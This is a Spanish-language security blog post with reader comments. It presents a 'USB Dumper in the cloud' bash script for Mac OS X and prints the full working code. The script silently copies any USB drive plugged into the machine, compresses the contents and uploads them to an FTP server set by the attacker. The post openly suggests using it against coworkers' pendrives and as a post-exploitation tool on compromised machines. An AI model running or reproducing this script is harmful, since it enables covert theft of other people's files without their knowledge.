Menú principal

martes, 25 de octubre de 2011

USB Dumper in the cloud: Roba datos de pendrives por USB y mándalos a la nube (a un servidor FTP)

USBDumper es un pequeño script desarrollado en Octubre del año pasado para Seguridad Apple desde el equipo de auditoría de aplicaciones web de Informática64, y cuya finalidad era demostrar en una prueba de concepto (POC), que se pueden robar los datos de los pendrives que se conectan a nuestro equipo Mac OS X fácilmente, y luego sacar el "jugo" de los datos robados.

Tal y como se comentó en el artículo USB Dumping en Mac OS X, este tipo de ataques resulta muy efectivo en entornos de trabajo en donde un compañero te pide la impresión de un documento, o la copia de determinado fichero de un dispositivo extraíble, siempre bajo su supervisión. Sin embargo, desde el momento en que se conecta el pendrive a nuestro querido Mac OS X, éste empezará a realizar un copiado del pendrive de forma totalmente transparente en el directorio /tmp/Volumes/.

La nueva versión de este programa para hacer USB Dumping, que ha sido desarrollada a petición de un lector asiduo de Seguridad Apple, incorpora la nueva funcionalidad de comprimir el contenido del dispositivo y subirlo a un servidor FTP. De este modo, el atacante – o ladrón de datos – dispondrá de sus backups en la nube.

Sabemos que podríamos haber resuelto el problema de sinconización con la nube añadiendo la carpeta donde se copian los backups a la lista de carpetas a sincronizar con algún servicio de online backup, como Dropbox o Zendal Backup, pero entonces no podría usarse como una herramienta de post-explotación en una máquina.

De esta forma, el script serviría para controlar una máquina explotada o podría ser una aplicación ideal para complementar un ataque David Hasselhoff, ya que además de hacerle una pequeña "broma" en su escritorio, estará subiendo al servidor FTP el contenido de sus dispositivos, a los cuales tendremos acceso incluso sin necesidad de que el usuario se vuelva a dejar desbloqueado el equipo.

A continuación mostramos el código de la nueva versión de USB Dumper "in the cloud" , el cual requiere que se editen las variables SERVER, USERNAME y PASSWORD, localizadas en las primeras líneas del script.

Figura 1: USB Dumper enviando el backup a la nube

A continuación mostramos el código de la nueva versión de USB Dumper in the cloud, al cual es necesario editarle las variables SERVER, USERNAME y PASSWORD localizados en las primeras líneas del script.

#!/bin/bash
#www.seguridadapple.com

SERVER="host"
USERNAME="user"
PASSWORD="password"

function saveDefaultDevices()
{
rm -rf /tmp/usblist /tmp/Volumes
mkdir /tmp/Volumes
for vol in /Volumes/*
do
echo $vol >> /tmp/usblist
echo "Detecting $vol as default"
done
}

function checkDevices()
{
for vol in /Volumes/*
do
aux=`cat /tmp/usblist |grep -i "$vol"`
aux=`echo $?`
if [ $aux -eq 1 ]; then
nombre=`echo $vol | awk -F "/" '{print $3}'`
echo $vol >> /tmp/usblist
mkdir "/tmp$vol"?
echo "[+] Dumping $vol in /tmp$vol"
sleep 1
cp -R "$vol" "/tmp/Volumes/"
auxVol="/tmp/$nombre.zip"
rm -rf $auxVol
echo "Compressing files [ /tmp$vol in $auxVol ]"
zip -r "$auxVol" "/tmp$vol" > /dev/null
echo "Uploading to FTP"
ftp -n -i $SERVER <<EOF
user $USERNAME $PASSWORD
binary
put "$auxVol" "$nombre"
quit
EOF
echo "[+] Done"
fi
done
}

saveDefaultDevices

while [ 1 ]; do
checkDevices
sleep 1
done

4 comentarios:

  1. Me ha gustado el script, es interesante lo que se puede hacer con unas pocas líneas de código.

    Entiendo que es solo un POC pero para ponerlo en "producción" habría que tener muchas mas cosas en cuenta ¿que sucede si conectan por USB un disco duro de 1TB? ¿se copiaria todo el disco duro? el usuario del disco duro se daria cuenta porque la lucecita empezaria a parpadear como una descosida mientras copia todo el contenido y rápidamente nos quedariamos sin espacio en nuestro ordenador (o en nuestro FTP)
    Habría que controlar los archivos grandes que sería una bestialidad enviarlos por FTP

    buen aporte.
    Gracias!

    ResponderEliminar
  2. Interesante herramienta. No he encontrado referencias sobre Android, aunque imagino que el rubber duckie no tendría mayores problemas en exportar - por ejemplo - el sql.lite de Whatsapp. Gracias por el aporte

    ResponderEliminar
  3. Muy interesante, sólo por conectarlo hace su trabajo? Genial!!

    ResponderEliminar
  4. tengo una pregunta, si no quiero usar el ftp como hago para inhabilitar e
    sa funcion?

    ResponderEliminar

Entrada destacada

Proteger tu cuenta de Google y de Gmail con Latch Cloud TOTP #Latch #Gmail #Google

La semana pasada se liberó la nueva versión de Latch y nuestro compañero Chema Alonso hizo un repaso de todo ello en su artículo Latch...

Otras historias relacionadas

Entradas populares